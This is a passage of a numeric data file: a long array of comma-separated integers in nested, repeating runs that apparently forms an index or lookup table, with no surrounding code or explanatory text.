6616, 6944, 7153, 7278, 7347, 4617, 4692, 4737,
4773, 4801, 4822, 4837, 2063, 3527, 6331, 3747,
6451, 6779, 3967, 6535, 6863, 7072, 4187, 6591,
6919, 7128, 7253, 4407, 6626, 6954, 7163, 7288,
7357, 4627, 6646, 6974, 7183, 7308, 7377, 7411,
4847, 4912, 4957, 4993, 5021, 5042, 5057, 5067,
2129, 2553, 5093, 2674, 5102, 5147, 2784, 5110,
5155, 5191, 2883, 5117, 5162, 5198, 5226, 2971,
5123, 5168, 5204, 5232, 5253, 3048, 5128, 5173,
5209, 5237, 5258, 5273, 3114, 5132, 5177, 5213,
5241, 5262, 5277, 5287, 3169, 2146, 2156, 2165,
2173, 2180, 2186, 2191, 2195, 116, 1670, 3375,
3595, 1736, 3420, 6224, 3640, 3815, 3860, 1802,
3456, 6260, 3676, 6380, 6708, 3896, 4035, 4080,
4116, 1868, 3484, 6288, 3704, 6408, 6736, 3924,
6492, 6820, 7029, 4144, 4255, 4300, 4336, 4364,
1934, 3505, 6309, 3725, 6429, 6757, 3945, 6513,
6841, 7050, 4165, 6569, 6897, 7106, 7231, 4385,
4475, 4520, 4556, 4584, 4605, 2000, 3520, 6324,
3740, 6444, 6772, 3960, 6528, 6856, 7065, 4180,
6584, 6912, 7121, 7246, 4400, 6619, 6947, 7156,
7281, 7350, 4620, 4695, 4740, 4776, 4804, 4825,
4840, 2066, 3530, 6334, 3750, 6454, 6782, 3970,
6538, 6866, 7075, 4190, 6594, 6922, 7131, 7256,
4410, 6629, 6957, 7166, 7291, 7360, 4630, 6649,
6977, 7186, 7311, 7380, 7414, 4850, 4915, 4960,
4996, 5024, 5045, 5060, 5070, 2132, 3536, 6340,
3756, 6460, 6788, 3976, 6544, 6872, 7081, 4196,
6600, 6928, 7137, 7262, 4416, 6635, 6963, 7172,
7297, 7366, 4636, 6655, 6983, 7192, 7317, 7386,
7420, 4856, 1607, 1607, 1607, 1607, 1607, 1607,
1606, 1607, 5135, 5180, 5216, 5244, 5265, 5280,
5290, 1607, 2198, 2564, 5313, 2685, 5322, 5367,
2795, 5330, 5375, 5411, 2894, 5337, 5382, 5418,
5446, 2982, 5343, 5388, 5424, 5452, 5473, 3059,
5348, 5393, 5429, 5457, 5478, 5493, 3125, 5352,
5397, 5433, 5461, 5482, 5497, 5507, 3180, 5355,
5400, 5436, 5464, 5485, 5500, 5510, 1607, 3224,
2212, 2222, 2231, 2239, 2246, 2252, 2257, 2261,
2264, 128, 176, 2567, 2688, 188, 2568, 5526,
2689, 2798, 2799, 200, 2569, 5527, 2690, 5536,
5581, 2800, 2897, 2898, 2899, 212, 2570, 5528,
2691, 5537, 5582, 2801, 5545, 5590, 5626, 2900,
2985, 2986, 2987, 2988, 224, 2571, 5529, 2692,
5538, 5583, 2802, 5546, 5591, 5627, 2901, 5553,
5598, 5634, 5662, 2989, 3062, 3063, 3064, 3065,
3066, 236, 2572, 5530, 2693, 5539, 5584, 2803,
5547, 5592, 5628, 2902, 5554, 5599, 5635, 5663,
2990, 5560, 5605, 5641, 5669, 5690, 3067, 3128,
3129, 3130, 3131, 3132, 3133, 248, 2573, 5531,
2694, 5540, 5585, 2804, 5548, 5593, 5629, 2903,
5555, 5600, 5636, 5664, 2991, 5561, 5606, 5642,
5670, 5691, 3068, 5566, 5611, 5647, 5675, 5696,
5711, 3134, 3183, 3184, 3185, 3186, 3187, 3188,
3189, 260, 2574, 5532, 2695, 5541, 5586, 2805,
5549, 5594, 5630, 2904, 5556, 5601, 5637, 5665,
2992, 5562, 5607, 5643, 5671, 5692, 3069, 5567,
5612, 5648, 5676, 5697, 5712, 3135, 5571, 5616,
5652, 5680, 5701, 5716, 5726, 3190, 3227, 3228,
3229, 3230, 3231, 3232, 3233, 3234, 272, 2575,
5533, 2696, 5542, 5587, 2806, 5550, 5595, 5631,
2905, 5557, 5602, 5638, 5666, 2993, 5563, 5608,
5644, 5672, 5693, 3070, 5568, 5613, 5649, 5677,
5698, 5713, 3136, 5572, 5617, 5653, 5681, 5702,
5717, 5727, 3191, 5575, 5620, 5656, 5684, 5705,
5720, 5730, 1607, 3235, 3260, 3261, 3262, 3263,
3264, 3265, 3266, 3267, 3268, 284, 287, 2270,
288, 2271, 2281, 289, 2272, 2282, 2291, 290,
2273, 2283, 2292, 2300, 291, 2274, 2284, 2293,
2301, 2308, 292, 2275, 2285, 2294, 2302, 2309,
2315, 293, 2276, 2286, 2295, 2303, 2310, 2316,
2321, 294, 2277, 2287, 2296, 2304, 2311, 2317,
2322, 2326, 295, 2278, 2288, 2297, 2305, 2312,
2318, 2323, 2327, 2330, 296, 131, 132, 133,
134, 135, 136, 137, 138, 139, 140, 21,
177, 2477, 189, 33, 177, 2578, 2699, 189,
2488, 2809, 2609, 201, 201, 45, 177, 2578,
2699, 189, 2579, 5746, 2700, 2809, 2810, 201,
2499, 2908, 2620, 2908, 2909, 2730, 213, 213,
213, 57, 177, 2578, 2699, 189, 2579, 5746,
2700, 2809, 2810, 201, 2580, 5747, 2701, 5756,
5801, 2811, 2908, 2909, 2910, 213, 2510, 2996,
2631, 2996, 2997, 2741, 2996, 2997, 2998, 2840,
225, 225, 225, 225, 69, 177, 2578, 2699,
189, 2579, 5746, 2700, 2809, 2810, 201, 2580,
5747, 2701, 5756, 5801, 2811, 2908, 2909, 2910,
213, 2581, 5748, 2702, 5757, 5802, 2812, 5765,
5810, 5846, 2911, 2996, 2997, 2998, 2999, 225,
2521, 3073, 2642, 3073, 3074, 2752, 3073, 3074,
3075, 2851, 3073, 3074, 3075, 3076, 2939, 237,
237, 237, 237, 237, 81, 177, 2578, 2699,
189, 2579, 5746, 2700, 2809, 2810, 201, 2580,
5747, 2701, 5756, 5801, 2811, 2908, 2909, 2910,
213, 2581, 5748, 2702, 5757, 5802, 2812, 5765,
5810, 5846, 2911, 2996, 2997, 2998, 2999, 225,
2582, 5749, 2703, 5758, 5803, 2813, 5766, 5811,
5847, 2912, 5773, 5818, 5854, 5882, 3000, 3073,
3074, 3075, 3076, 3077, 237, 2532, 3139, 2653,
3139, 3140, 2763, 3139, 3140, 3141, 2862, 3139,
3140, 3141, 3142, 2950, 3139, 3140, 3141, 3142,
3143, 3027, 249, 249, 249, 249, 249, 249,
93, 177, 2578, 2699, 189, 2579, 5746, 2700,
2809, 2810, 201, 2580, 5747, 2701, 5756, 5801,
2811, 2908, 2909, 2910, 213, 2581, 5748, 2702,
5757, 5802, 2812, 5765, 5810, 5846, 2911, 2996,
2997, 2998, 2999, 225, 2582, 5749, 2703, 5758,
5803, 2813, 5766, 5811, 5847, 2912, 5773, 5818,
5854, 5882, 3000, 3073, 3074, 3075, 3076, 3077,
237, 2583, 5750, 2704, 5759, 5804, 2814, 5767,
5812, 5848, 2913, 5774, 5819, 5855, 5883, 3001,
5780, 5825, 5861, 5889, 5910, 3078, 3139, 3140,
3141, 3142, 3143, 3144, 249, 2543, 3194, 2664,
3194, 3195, 2774, 3194, 3195, 3196, 2873, 3194,
3195, 3196, 3197, 2961, 3194, 3195, 3196, 3197,
3198, 3038, 3194, 3195, 3196, 3197, 3198, 3199,
3104, 261, 261, 261, 261, 261, 261, 261,
105, 177, 2578, 2699, 189, 2579, 5746, 2700,
2809, 2810, 201, 2580, 5747, 2701, 5756, 5801,
2811, 2908, 2909, 2910, 213, 2581, 5748, 2702,
5757, 5802, 2812, 5765, 5810, 5846, 2911, 2996,
2997, 2998, 2999, 225, 2582, 5749, 2703, 5758,
5803, 2813, 5766, 5811, 5847, 2912, 5773, 5818,
5854, 5882, 3000, 3073, 3074, 3075, 3076, 3077,
237, 2583, 5750, 2704, 5759, 5804, 2814, 5767,
5812, 5848, 2913, 5774, 5819, 5855, 5883, 3001,
5780, 5825, 5861, 5889, 5910, 3078, 3139, 3140,
3141, 3142, 3143, 3144, 249, 2584, 5751, 2705,
5760, 5805, 2815, 5768, 5813, 5849, 2914, 5775,
5820, 5856, 5884, 3002, 5781, 5826, 5862, 5890,
5911, 3079, 5786, 5831, 5867, 5895, 5916, 5931,
3145, 3194, 3195, 3196, 3197, 3198, 3199, 3200,
261, 2554, 3238, 2675, 3238, 3239, 2785, 3238,
3239, 3240, 2884, 3238, 3239, 3240, 3241, 2972,
3238, 3239, 3240, 3241, 3242, 3049, 3238, 3239,
3240, 3241, 3242, 3243, 3115, 3238, 3239, 3240,
3241, 3242, 3243, 3244, 3170, 273, 273, 273,
273, 273, 273, 273, 273, 117, 177, 2578,
2699, 189, 2579, 5746, 2700, 2809, 2810, 201,
2580, 5747, 2701, 5756, 5801, 2811, 2908, 2909,
2910, 213, 2581, 5748, 2702, 5757, 5802, 2812,
5765, 5810, 5846, 2911, 2996, 2997, 2998, 2999,
225, 2582, 5749, 2703, 5758, 5803, 2813, 5766,
5811, 5847, 2912, 5773, 5818, 5854, 5882, 3000,
3073, 3074, 3075, 3076, 3077, 237, 2583, 5750,
2704, 5759, 5804, 2814, 5767, 5812, 5848, 2913,
5774, 5819, 5855, 5883, 3001, 5780, 5825, 5861,
5889, 5910, 3078, 3139, 3140, 3141, 3142, 3143,
3144, 249, 2584, 5751, 2705, 5760, 5805, 2815,
5768, 5813, 5849, 2914, 5775, 5820, 5856, 5884,
3002, 5781, 5826, 5862, 5890, 5911, 3079, 5786,
5831, 5867, 5895, 5916, 5931, 3145, 3194, 3195,
3196, 3197, 3198, 3199, 3200, 261, 2585, 5752,
2706, 5761, 5806, 2816, 5769, 5814, 5850, 2915,
5776, 5821, 5857, 5885, 3003, 5782, 5827, 5863,
5891, 5912, 3080, 5787, 5832, 5868, 5896, 5917,
5932, 3146, 5791, 5836, 5872, 5900, 5921, 5936,
5946, 3201, 3238, 3239, 3240, 3241, 3242, 3243,
3244, 3245, 273, 2565, 3271, 2686, 3271, 3272,
2796, 3271, 3272, 3273, 2895, 3271, 3272, 3273,
3274, 2983, 3271, 3272, 3273, 3274, 3275, 3060,
3271, 3272, 3273, 3274, 3275, 3276, 3126, 3271,
3272, 3273, 3274, 3275, 3276, 3277, 3181, 3271,
3272, 3273, 3274, 3275, 3276, 3277, 3278, 3225,
285, 285, 285, 285, 285, 285, 285, 285,
285, 129, 177, 2578, 2699, 189, 2579, 5746,
2700, 2809, 2810, 201, 2580, 5747, 2701, 5756,
5801, 2811, 2908, 2909, 2910, 213, 2581, 5748,
2702, 5757, 5802, 2812, 5765, 5810, 5846, 2911,
2996, 2997, 2998, 2999, 225, 2582, 5749, 2703,
5758, 5803, 2813, 5766, 5811, 5847, 2912, 5773,
5818, 5854, 5882, 3000, 3073, 3074, 3075, 3076,
3077, 237, 2583, 5750, 2704, 5759, 5804, 2814,
5767, 5812, 5848, 2913, 5774, 5819, 5855, 5883,
3001, 5780, 5825, 5861, 5889, 5910, 3078, 3139,
3140, 3141, 3142, 3143, 3144, 249, 2584, 5751,
2705, 5760, 5805, 2815, 5768, 5813, 5849, 2914,
5775, 5820, 5856, 5884, 3002, 5781, 5826, 5862,
5890, 5911, 3079, 5786, 5831, 5867, 5895, 5916,
5931, 3145, 3194, 3195, 3196, 3197, 3198, 3199,
3200, 261, 2585, 5752, 2706, 5761, 5806, 2816,
5769, 5814, 5850, 2915, 5776, 5821, 5857, 5885,
3003, 5782, 5827, 5863, 5891, 5912, 3080, 5787,
5832, 5868, 5896, 5917, 5932, 3146, 5791, 5836,
5872, 5900, 5921, 5936, 5946, 3201, 3238, 3239,
3240, 3241, 3242, 3243, 3244, 3245, 273, 2586,
5753, 2707, 5762, 5807, 2817, 5770, 5815, 5851,
2916, 5777, 5822, 5858, 5886, 3004, 5783, 5828,
5864, 5892, 5913, 3081, 5788, 5833, 5869, 5897,
5918, 5933, 3147, 5792, 5837, 5873, 5901, 5922,
5937, 5947, 3202, 5795, 5840, 5876, 5904, 5925,
5940, 5950, 1607, 3246, 3271, 3272, 3273, 3274,
3275, 3276, 3277, 3278, 3279, 285, 2576, 3293,
2697, 3293, 3294, 2807, 3293, 3294, 3295, 2906,
3293, 3294, 3295, 3296, 2994, 3293, 3294, 3295,
3296, 3297, 3071, 3293, 3294, 3295, 3296, 3297,
3298, 3137, 3293, 3294, 3295, 3296, 3297, 3298,
3299, 3192, 3293, 3294, 3295, 3296, 3297, 3298,
3299, 3300, 3236, 3293, 3294, 3295, 3296, 3297,
3298, 3299, 3300, 3301, 3269, 297, 297, 297,
297, 297, 297, 297, 297, 297, 297, 141,
177, 299, 300, 189, 299, 2336, 300, 301,
301, 201, 299, 2336, 300, 2337, 2347, 301,
302, 302, 302, 213, 299, 2336, 300, 2337,
2347, 301, 2338, 2348, 2357, 302, 303, 303,
303, 303, 225, 299, 2336, 300, 2337, 2347,
301, 2338, 2348, 2357, 302, 2339, 2349, 2358,
2366, 303, 304, 304, 304, 304, 304, 237,
299, 2336, 300, 2337, 2347, 301, 2338, 2348,
2357, 302, 2339, 2349, 2358, 2366, 303, 2340,
2350, 2359, 2367, 2374, 304, 305, 305, 305,
305, 305, 305, 249, 299, 2336, 300, 2337,
2347, 301, 2338, 2348, 2357, 302, 2339, 2349,
2358, 2366, 303, 2340, 2350, 2359, 2367, 2374,
304, 2341, 2351, 2360, 2368, 2375, 2381, 305,
306, 306, 306, 306, 306, 306, 306, 261,
299, 2336, 300, 2337, 2347, 301, 2338, 2348,
2357, 302, 2339, 2349, 2358, 2366, 303, 2340,
2350, 2359, 2367, 2374, 304, 2341, 2351, 2360,
2368, 2375, 2381, 305, 2342, 2352, 2361, 2369,
2376, 2382, 2387, 306, 307, 307, 307, 307,
307, 307, 307, 307, 273, 299, 2336, 300,
2337, 2347, 301, 2338, 2348, 2357, 302, 2339,
2349, 2358, 2366, 303, 2340, 2350, 2359, 2367,
2374, 304, 2341, 2351, 2360, 2368, 2375, 2381,
305, 2342, 2352, 2361, 2369, 2376, 2382, 2387,
306, 2343, 2353, 2362, 2370, 2377, 2383, 2388,
2392, 307, 308, 308, 308, 308, 308, 308,
308, 308, 308, 285, 299, 2336, 300, 2337,
2347, 301, 2338, 2348, 2357, 302, 2339, 2349,
2358, 2366, 303, 2340, 2350, 2359, 2367, 2374,
304, 2341, 2351, 2360, 2368, 2375, 2381, 305,
2342, 2352, 2361, 2369, 2376, 2382, 2387, 306,
2343, 2353, 2362, 2370, 2377, 2383, 2388, 2392,
307, 2344, 2354, 2363, 2371, 2378, 2384, 2389,
2393, 2396, 308, 309, 309, 309, 309, 309,
309, 309, 309, 309, 309, 297, 143, 143,
144, 143, 144, 145, 143, 144, 145, 146,
143, 144, 145, 146, 147, 143, 144, 145,
146, 147, 148, 143, 144, 145, 146, 147,
148, 149, 143, 144, 145, 146, 147, 148,
149, 150, 143, 144, 145, 146, 147, 148,
149, 150, 151, 143, 144, 145, 146, 147,
148, 149, 150, 151, 152, 143, 144, 145,
146, 147, 148, 149, 150, 151, 152, 153,
11, 167, 179, 23, 12, 1610, 2468, 1676,
24, 168, 2479, 2600, 180, 191, 1742, 192,
35, 36, 13, 1611, 2469, 1677, 25, 1621,
3326, 3546, 1687, 2480, 3766, 2601, 1743, 1753,
37, 169, 2490, 2611, 181, 2491, 3986, 2612,
2721, 2722, 193, 203, 1808, 204, 1809, 1819,
205, 47, 48, 49, 14, 1612, 2470, 1678,
26, 1622, 3327, 3547, 1688, 2481, 3767, 2602,
1744, 1754, 38, 1631, 3336, 3556, 1697, 3381,
1600, 3601, 3776, 3821, 1763, 2492, 3987, 2613,
3996, 4041, 2723, 1810, 1820, 1829, 50, 170,
2501, 2622, 182, 2502, 4206, 2623, 2732, 2733,
194, 2503, 4207, 2624, 4216, 4261, 2734, 2831,
2832, 2833, 206, 215, 1874, 216, 1875, 1885,
217, 1876, 1886, 1895, 218, 59, 60, 61,
62, 15, 1613, 2471, 1679, 27, 1623, 3328,
3548, 1689, 2482, 3768, 2603, 1745, 1755, 39,
1632, 3337, 3557, 1698, 3382, 6186, 3602, 3777,
3822, 1764, 2493, 3988, 2614, 3997, 4042, 2724,
1811, 1821, 1830, 51, 1640, 3345, 3565, 1706,
3390, 6194, 3610, 3785, 3830, 1772, 3426, 6230,
3646, 6350, 1601, 3866, 4005, 4050, 4086, 1838,
2504, 4208, 2625, 4217, 4262, 2735, 4225, 4270,
4306, 2834, 1877, 1887, 1896, 1904, 63, 171,
2512, 2633, 183, 2513, 4426, 2634, 2743, 2744,
195, 2514, 4427, 2635, 4436, 4481, 2745, 2842,
2843, 2844, 207, 2515, 4428, 2636, 4437, 4482,
2746, 4445, 4490, 4526, 2845, 2930, 2931, 2932,
2933, 219, 227, 1940, 228, 1941, 1951, 229,
1942, 1952, 1961, 230, 1943, 1953, 1962, 1970,
231, 71, 72, 73, 74, 75, 16, 1614,
2472, 1680, 28, 1624, 3329, 3549, 1690, 2483,
3769, 2604, 1746, 1756, 40, 1633, 3338, 3558,
1699, 3383, 6187, 3603, 3778, 3823, 1765, 2494,
3989, 2615, 3998, 4043, 2725, 1812, 1822, 1831,
52, 1641, 3346, 3566, 1707, 3391, 6195, 3611,
3786, 3831, 1773, 3427, 6231, 3647, 6351, 6679,
3867, 4006, 4051, 4087, 1839, 2505, 4209, 2626,
4218, 4263, 2736, 4226, 4271, 4307, 2835, 1878,
1888, 1897, 1905, 64, 1648, 3353, 3573, 1714,
3398, 6202, 3618, 3793, 3838, 1780, 3434, 6238,
3654, 6358, 6686, 3874, 4013, 4058, 4094, 1846,
3462, 6266, 3682, 6386, 6714, 3902, 6470, 6798,
1602, 4122, 4233, 4278, 4314, 4342, 1912, 2516,
4429, 2637, 4438, 4483, 2747, 4446, 4491, 4527,
2846, 4453, 4498, 4534, 4562, 2934, 1944, 1954,
1963, 1971, 1978, 76, 172, 2523, 2644, 184,
2524, 4646, 2645, 2754, 2755, 196, 2525, 4647,
2646, 4656, 4701, 2756, 2853, 2854, 2855, 208,
2526, 4648, 2647, 4657, 4702, 2757, 4665, 4710,
4746, 2856, 2941, 2942, 2943, 2944, 220, 2527,
4649, 2648, 4658, 4703, 2758, 4666, 4711, 4747,
2857, 4673, 4718, 4754, 4782, 2945, 3018, 3019,
3020, 3021, 3022, 232, 239, 2006, 240, 2007,
2017, 241, 2008, 2018, 2027, 242, 2009, 2019,
2028, 2036, 243, 2010, 2020, 2029, 2037, 2044,
244, 83, 84, 85, 86, 87, 88, 17,
1615, 2473, 1681, 29, 1625, 3330, 3550, 1691,
2484, 3770, 2605, 1747, 1757, 41, 1634, 3339,
3559, 1700, 3384, 6188, 3604, 3779, 3824, 1766,
2495, 3990, 2616, 3999, 4044, 2726, 1813, 1823,
1832, 53, 1642, 3347, 3567, 1708, 3392, 6196,
3612, 3787, 3832, 1774, 3428, 6232, 3648, 6352,
6680, 3868, 4007, 4052, 4088, 1840, 2506, 4210,
2627, 4219, 4264, 2737, 4227, 4272, 4308, 2836,
1879, 1889, 1898, 1906, 65, 1649, 3354, 3574,
1715, 3399, 6203, 3619, 3794, 3839, 1781, 3435,
6239, 3655, 6359, 6687, 3875, 4014, 4059, 4095,
1847, 3463, 6267, 3683, 6387, 6715, 3903, 6471,
6799, 7008, 4123, 4234, 4279, 4315, 4343, 1913,
2517, 4430, 2638, 4439, 4484, 2748, 4447, 4492,
4528, 2847, 4454, 4499, 4535, 4563, 2935, 1945,
1955, 1964, 1972, 1979, 77, 1655, 3360, 3580,
1721, 3405, 6209, 3625, 3800, 3845, 1787, 3441,
6245, 3661, 6365, 6693, 3881, 4020, 4065, 4101,
1853, 3469, 6273, 3689, 6393, 6721, 3909, 6477,
6805, 7014, 4129, 4240, 4285, 4321, 4349, 1919,
3490, 6294, 3710, 6414, 6742, 3930, 6498, 6826,
7035, 4150, 6554, 6882, 7091, 1603, 4370, 4460,
4505, 4541, 4569, 4590, 1985, 2528, 4650, 2649,
4659, 4704, 2759, 4667, 4712, 4748, 2858, 4674,
4719, 4755, 4783, 2946, 4680, 4725, 4761, 4789,
4810, 3023, 2011, 2021, 2030, 2038, 2045, 2051,
89, 173, 2534, 2655, 185, 2535, 4866, 2656,
2765, 2766, 197, 2536, 4867, 2657, 4876, 4921,
2767, 2864, 2865, 2866, 209, 2537, 4868, 2658,
4877, 4922, 2768, 4885, 4930, 4966, 2867, 2952,
2953, 2954, 2955, 221, 2538, 4869, 2659, 4878,
4923, 2769, 4886, 4931, 4967, 2868, 4893, 4938,
4974, 5002, 2956, 3029, 3030, 3031, 3032, 3033,
233, 2539, 4870, 2660, 4879, 4924, 2770, 4887,
4932, 4968, 2869, 4894, 4939, 4975, 5003, 2957,
4900, 4945, 4981, 5009, 5030, 3034, 3095, 3096,
3097, 3098, 3099, 3100, 245, 251, 2072, 252,
2073, 2083, 253, 2074, 2084, 2093, 254, 2075,
2085, 2094, 2102, 255, 2076, 2086, 2095, 2103,
2110, 256, 2077, 2087, 2096, 2104, 2111, 2117,
257, 95, 96, 97, 98, 99, 100, 101,
18, 1616, 2474, 1682, 30, 1626, 3331, 3551,
1692, 2485, 3771, 2606, 1748, 1758, 42, 1635,
3340, 3560, 1701, 3385, 6189, 3605, 3780, 3825,
1767, 2496, 3991, 2617, 4000, 4045, 2727, 1814,
1824, 1833, 54, 1643, 3348, 3568, 1709, 3393,
6197, 3613, 3788, 3833, 1775, 3429, 6233, 3649,
6353, 6681, 3869, 4008, 4053, 4089, 1841, 2507,
4211, 2628, 4220, 4265, 2738, 4228, 4273, 4309,
2837, 1880, 1890, 1899, 1907, 66, 1650, 3355,
3575, 1716, 3400, 6204, 3620, 3795, 3840, 1782,
3436, 6240, 3656, 6360, 6688, 3876, 4015, 4060,
4096, 1848, 3464, 6268, 3684, 6388, 6716, 3904,
6472, 6800, 7009, 4124, 4235, 4280, 4316, 4344,
1914, 2518, 4431, 2639, 4440, 4485, 2749, 4448,
4493, 4529, 2848, 4455, 4500, 4536, 4564, 2936,
1946, 1956, 1965, 1973, 1980, 78, 1656, 3361,
3581, 1722, 3406, 6210, 3626, 3801, 3846, 1788,
3442, 6246, 3662, 6366, 6694, 3882, 4021, 4066,
4102, 1854, 3470, 6274, 3690, 6394, 6722, 3910,
6478, 6806, 7015, 4130, 4241, 4286, 4322, 4350,
1920, 3491, 6295, 3711, 6415, 6743, 3931, 6499,
6827, 7036, 4151, 6555, 6883, 7092, 7217, 4371,
4461, 4506, 4542, 4570, 4591, 1986, 2529, 4651,
2650, 4660, 4705, 2760, 4668, 4713, 4749, 2859,
4675, 4720, 4756, 4784, 2947, 4681, 4726, 4762,
4790, 4811, 3024, 2012, 2022, 2031, 2039, 2046,
2052, 90, 1661, 3366, 3586, 1727, 3411, 6215,
3631, 3806, 3851, 1793, 3447, 6251, 3667, 6371,
6699, 3887, 4026, 4071, 4107, 1859, 3475, 6279,
3695, 6399, 6727, 3915, 6483, 6811, 7020, 4135,
4246, 4291, 4327, 4355, 1925, 3496, 6300, 3716,
6420, 6748, 3936, 6504, 6832, 7041, 4156, 6560,
6888, 7097, 7222, 4376, 4466, 4511, 4547, 4575,
4596, 1991, 3511, 6315, 3731, 6435, 6763, 3951,
6519, 6847, 7056, 4171, 6575, 6903, 7112, 7237,
4391, 6610, 6938, 7147, 7272, 1604, 4611, 4686,
4731, 4767, 4795, 4816, 4831, 2057, 2540, 4871,
2661, 4880, 4925, 2771, 4888, 4933, 4969, 2870,
4895, 4940, 4976, 5004, 2958, 4901, 4946, 4982,
5010, 5031, 3035, 4906, 4951, 4987, 5015, 5036,
5051, 3101, 2078, 2088, 2097, 2105, 2112, 2118,
2123, 102, 174, 2545, 2666, 186, 2546, 5086,
2667, 2776, 2777, 198, 2547, 5087, 2668, 5096,
5141, 2778, 2875, 2876, 2877, 210, 2548, 5088,
2669, 5097, 5142, 2779, 5105, 5150, 5186, 2878,
2963, 2964, 2965, 2966, 222, 2549, 5089, 2670,
5098, 5143, 2780, 5106, 5151, 5187, 2879, 5113,
5158, 5194, 5222, 2967, 3040, 3041, 3042, 3043,
3044, 234, 2550, 5090, 2671, 5099, 5144, 2781,
5107, 5152, 5188, 2880, 5114, 5159, 5195, 5223,
2968, 5120, 5165, 5201, 5229, 5250, 3045, 3106,
3107, 3108, 3109, 3110, 3111, 246, 2551, 5091,
2672, 5100, 5145, 2782, 5108, 5153, 5189, 2881,
5115, 5160, 5196, 5224, 2969, 5121, 5166, 5202,
5230, 5251, 3046, 5126, 5171, 5207, 5235, 5256,
5271, 3112, 3161, 3162, 3163, 3164, 3165, 3166,
3167, 258, 263, 2138, 264, 2139, 2149, 265,
2140, 2150, 2159, 266, 2141, 2151, 2160, 2168,
267, 2142, 2152, 2161, 2169, 2176, 268, 2143,
2153, 2162, 2170, 2177, 2183, 269, 2144, 2154,
2163, 2171, 2178, 2184, 2189, 270, 107, 108,
109, 110, 111, 112, 113, 114, 19, 1617,
2475, 1683, 31, 1627, 3332, 3552, 1693, 2486,
3772, 2607, 1749, 1759, 43, 1636, 3341, 3561,
1702, 3386, 6190, 3606, 3781, 3826, 1768, 2497,
3992, 2618, 4001, 4046, 2728, 1815, 1825, 1834,
55, 1644, 3349, 3569, 1710, 3394, 6198, 3614,
3789, 3834, 1776, 3430, 6234, 3650, 6354, 6682,
3870, 4009, 4054, 4090, 1842, 2508, 4212, 2629,
4221, 4266, 2739, 4229, 4274, 4310, 2838, 1881,
1891, 1900, 1908, 67, 1651, 3356, 3576, 1717,
3401, 6205, 3621, 3796, 3841, 1783, 3437, 6241,
3657, 6361, 6689, 3877, 4016, 4061, 4097, 1849,
3465, 6269, 3685, 6389, 6717, 3905, 6473, 6801,
7010, 4125, 4236, 4281, 4317, 4345, 1915, 2519,
4432, 2640, 4441, 4486, 2750, 4449, 4494, 4530,
2849, 4456, 4501, 4537, 4565, 2937, 1947, 1957,
1966, 1974, 1981, 79, 1657, 3362, 3582, 1723,
3407, 6211, 3627, 3802, 3847, 1789, 3443, 6247,
3663, 6367, 6695, 3883, 4022, 4067, 4103, 1855,
3471, 6275, 3691, 6395, 6723, 3911, 6479, 6807,
7016, 4131, 4242, 4287, 4323, 4351, 1921, 3492,
6296, 3712, 6416, 6744, 3932, 6500, 6828, 7037,
4152, 6556, 6884, 7093, 7218, 4372, 4462, 4507,
4543, 4571, 4592, 1987, 2530, 4652, 2651, 4661,
4706, 2761, 4669, 4714, 4750, 2860, 4676, 4721,
4757, 4785, 2948, 4682, 4727, 4763, 4791, 4812,
3025, 2013, 2023, 2032, 2040, 2047, 2053, 91,
1662, 3367, 3587, 1728, 3412, 6216, 3632, 3807,
3852, 1794, 3448, 6252, 3668, 6372, 6700, 3888,
4027, 4072, 4108, 1860, 3476, 6280, 3696, 6400,
6728, 3916, 6484, 6812, 7021, 4136, 4247, 4292,
4328, 4356, 1926, 3497, 6301, 3717, 6421, 6749,
3937, 6505, 6833, 7042, 4157, 6561, 6889, 7098,
7223, 4377, 4467, 4512, 4548, 4576, 4597, 1992,
3512, 6316, 3732, 6436, 6764, 3952, 6520, 6848,
7057, 4172, 6576, 6904, 7113, 7238, 4392, 6611,
6939, 7148, 7273, 7342, 4612, 4687, 4732, 4768,
4796, 4817, 4832, 2058, 2541, 4872, 2662, 4881,
4926, 2772, 4889, 4934, 4970, 2871, 4896, 4941,
4977, 5005, 2959, 4902, 4947, 4983, 5011, 5032,
3036, 4907, 4952, 4988, 5016, 5037, 5052, 3102,
2079, 2089, 2098, 2106, 2113, 2119, 2124, 103,
1666, 3371, 3591, 1732, 3416, 6220, 3636, 3811,
3856, 1798, 3452, 6256, 3672, 6376, 6704, 3892,
4031, 4076, 4112, 1864, 3480, 6284, 3700, 6404,
6732, 3920, 6488, 6816, 7025, 4140, 4251, 4296,
4332, 4360, 1930, 3501, 6305, 3721, 6425, 6753,
3941, 6509, 6837, 7046, 4161, 6565, 6893, 7102,
7227, 4381, 4471, 4516, 4552, 4580, 4601, 1996,
3516, 6320, 3736, 6440, 6768, 3956, 6524, 6852,
7061, 4176, 6580, 6908, 7117, 7242, 4396, 6615,
6943, 7152, 7277, 7346, 4616, 4691, 4736, 4772,
4800, 4821, 4836, 2062, 3526, 6330, 3746, 6450,
6778, 3966, 6534, 6862, 7071, 4186, 6590, 6918,
7127, 7252, 4406, 6625, 6953, 7162, 7287, 7356,
4626, 6645, 6973, 7182, 7307, 7376, 1605, 4846,
4911, 4956, 4992, 5020, 5041, 5056, 5066, 2128,
2552, 5092, 2673, 5101, 5146, 2783, 5109, 5154,
5190, 2882, 5116, 5161, 5197, 5225, 2970, 5122,
5167, 5203, 5231, 5252, 3047, 5127, 5172, 5208,
5236, 5257, 5272, 3113, 5131, 5176, 5212, 5240,
5261, 5276, 5286, 3168, 2145, 2155, 2164, 2172,
2179, 2185, 2190, 2194, 115, 175, 2556, 2677,
187, 2557, 5306, 2678, 2787, 2788, 199, 2558,
5307, 2679, 5316, 5361, 2789, 2886, 2887, 2888,
211, 2559, 5308, 2680, 5317, 5362, 2790, 5325,
5370, 5406, 2889, 2974, 2975, 2976, 2977, 223,
2560, 5309, 2681, 5318, 5363, 2791, 5326, 5371,
5407, 2890, 5333, 5378, 5414, 5442, 2978, 3051,
3052, 3053, 3054, 3055, 235, 2561, 5310, 2682,
5319, 5364, 2792, 5327, 5372, 5408, 2891, 5334,
5379, 5415, 5443, 2979, 5340, 5385, 5421, 5449,
5470, 3056, 3117, 3118, 3119, 3120, 3121, 3122,
247, 2562, 5311, 2683, 5320, 5365, 2793, 5328,
5373, 5409, 2892, 5335, 5380, 5416, 5444, 2980,
5341, 5386, 5422, 5450, 5471, 3057, 5346, 5391,
5427, 5455, 5476, 5491, 3123, 3172, 3173, 3174,
3175, 3176, 3177, 3178, 259, 2563, 5312, 2684,
5321, 5366, 2794, 5329, 5374, 5410, 2893, 5336,
5381, 5417, 5445, 2981, 5342, 5387, 5423, 5451,
5472, 3058, 5347, 5392, 5428, 5456, 5477, 5492,
